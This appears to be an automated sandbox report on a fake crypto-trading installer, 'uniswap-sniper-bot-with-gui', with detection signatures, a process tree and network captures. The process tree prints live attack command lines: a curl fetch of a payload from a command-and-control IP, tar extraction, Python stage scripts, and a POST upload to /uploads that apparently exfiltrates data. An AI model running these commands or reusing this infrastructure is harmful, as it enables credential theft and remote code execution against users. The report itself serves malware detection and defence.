Edit tour

Windows Analysis Report
uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Overview

General Information

Sample name:	uniswap-sniper-bot-with-gui Setup 1.0.0.exe
Analysis ID:	1562598
MD5:	48c179680e0b37d0262f7a402860b2a7
SHA1:	176b980270ebf5bcd3b0d1c855da42f0a92082e2
SHA256:	42595da250a90129217f1dea56bfbbd871b16ba5a3e63dc63dd5a44739d036b9
Tags:	exeuser-smica83
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Uses known network protocols on non-standard ports

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Drops PE files

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

uniswap-sniper-bot-with-gui Setup 1.0.0.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe" MD5: 48C179680E0B37D0262F7A402860B2A7)

cmd.exe (PID: 7720 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv | "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7772 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)

find.exe (PID: 7780 cmdline: "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)

uniswap-sniper-bot-with-gui.exe (PID: 7220 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF)

cmd.exe (PID: 5544 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 4924 cmdline: curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

uniswap-sniper-bot-with-gui.exe (PID: 4476 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

uniswap-sniper-bot-with-gui.exe (PID: 5228 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2052 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF)

uniswap-sniper-bot-with-gui.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --app-path="C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=4496754429 --mojo-platform-channel-handle=2376 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF)

cmd.exe (PID: 2196 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tar.exe (PID: 3352 cmdline: tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24)

uniswap-sniper-bot-with-gui.exe (PID: 3264 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1016 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF)

cmd.exe (PID: 8140 cmdline: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

python.exe (PID: 5580 cmdline: "C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo" MD5: C793995B4BE06C17BF4AAE2E1302196B)

cmd.exe (PID: 3864 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

python.exe (PID: 4812 cmdline: C:\Users\user\.pyp\python.exe C:\Users\user\.n2/pay MD5: C793995B4BE06C17BF4AAE2E1302196B)

conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

python.exe (PID: 4956 cmdline: C:\Users\user\.pyp\python.exe C:\Users\user\.n2/bow MD5: C793995B4BE06C17BF4AAE2E1302196B)

conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4456 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 1072 cmdline: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath " MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

python.exe (PID: 6416 cmdline: C:\Users\user\.pyp\python.exe C:\Users\user\.n2/mlip MD5: C793995B4BE06C17BF4AAE2E1302196B)

conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

System Summary

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\.pyp\python.exe C:\Users\user\.n2/bow, ParentImage: C:\Users\user\.pyp\python.exe, ParentProcessId: 4956, ParentProcessName: python.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 1072, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\.pyp\python.exe C:\Users\user\.n2/bow, ParentImage: C:\Users\user\.pyp\python.exe, ParentProcessId: 4956, ParentProcessName: python.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 1072, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\.pyp\python.exe C:\Users\user\.n2/bow, ParentImage: C:\Users\user\.pyp\python.exe, ParentProcessId: 4956, ParentProcessName: python.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 1072, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe, ParentProcessId: 7220, ParentProcessName: uniswap-sniper-bot-with-gui.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown"", ProcessId: 5544, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\.pyp\python.exe C:\Users\user\.n2/bow, ParentImage: C:\Users\user\.pyp\python.exe, ParentProcessId: 4956, ParentProcessName: python.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 1072, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\deed1b2d-6a1c-5708-934a-7202254448da

Jump to behavior

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\LICENSE.electron.txt			Jump to behavior

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: vulkan-1.dll.pdb source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1994272899.0000000005AE0000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1989802067.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1989983801.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: electron.exe.pdb source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: libGLESv2.dll.pdb source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vk_swiftshader.dll.pdb source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1994272899.0000000005E58000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\locales	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50026

Source: global traffic

TCP traffic: 192.168.2.4:49739 -> 86.104.74.51:1224

Source: global traffic	HTTP traffic detected: POST /uploads HTTP/1.1host: 86.104.74.51:1224content-type: multipart/form-data; boundary=--------------------------638837609524654576768723content-length: 108326Connection: closeData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 33 38 38 33 37 36 30 39 35 32 34 36 35 34 35 37 36 37 36 38 37 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 79 70 65 22 0d 0a 0d 0a 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 33 38 38 33 37 36 30 39 35 32 34 36 35 34 35 37 36 37 36 38 37 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 69 64 22 0d 0a 0d 0a 37 30 32 5f 38 31 33 38 34 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 33 38 38 33 37 36 30 39 35 32 34 36 35 34 35 37 36 37 36 38 37 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 74 73 22 0d 0a 0d 0a 31 37 33 32 35 35 37 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 33 38 38 33 37 36 30 39 35 32 34 36 35 34 35 37 36 37 36 38 37 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 75 6c 74 69 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 30 5f 6c 73 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a Data Ascii: ----------------------------638837609524654576768723Content-Disposition: form-data; name="type"7----------------------------638837609524654576768723Content-Disposition: form-data; name="hid"702_813848----------------------------638837609524654576768723Content-Disposition: form-data; name="uts"1732557909----------------------------638837609524654576768723Content-Disposition: form-data; name="multi_file"; filename="0_lst"Content-Type: application/octet-stream
Source: global traffic	HTTP traffic detected: GET /client/7/702 HTTP/1.1host: 86.104.74.51:1224Connection: close

Source: Joe Sandbox View	IP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /ajax/libs/materialize/1.0.0/css/materialize.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: " Not A;Brand";v="99", "Chromium";v="102"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) uniswap-sniper-bot-with-gui/1.0.0 Chrome/102.0.5005.167 Electron/19.1.9 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-GB

Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51
Source: unknown	TCP traffic detected without corresponding DNS query: 86.104.74.51

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Disposition: attachment; filename="p.zip"Accept-Ranges: bytesCache-Control: public, max-age=0Last-Modified: Wed, 13 Sep 2023 07:44:46 GMTETag: W/"3117874-18a8d7fee11"Content-Type: application/zipContent-Length: 51476596Date: Mon, 25 Nov 2024 18:05:12 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 50 4b 03 04 0a 00 00 00 00 00 24 80 d0 56 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 2e 70 79 70 2f 50 4b 03 04 0a 00 00 00 00 00 18 80 d0 56 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 2e 70 79 70 2f 44 4c 4c 73 2f 50 4b 03 04 14 00 00 00 08 00 4f a1 86 55 75 bb 04 c8 68 22 14 00 60 83 34 00 1b 00 00 00 2e 70 79 70 2f 44 4c 4c 73 2f 6c 69 62 63 72 79 70 74 6f 2d 31 5f 31 2e 64 6c 6c ec bd 05 58 d5 4b d7 f7 bf 15 1b 75 63 8b 89 b2 55 6c 74 1b d8 62 c2 11 bb 1b bb 50 0c 54 8e dd b5 45 3d b6 1e bb bb 3b 41 c1 ee 0e 40 6c b1 c0 c6 7e bf 9f 0d 18 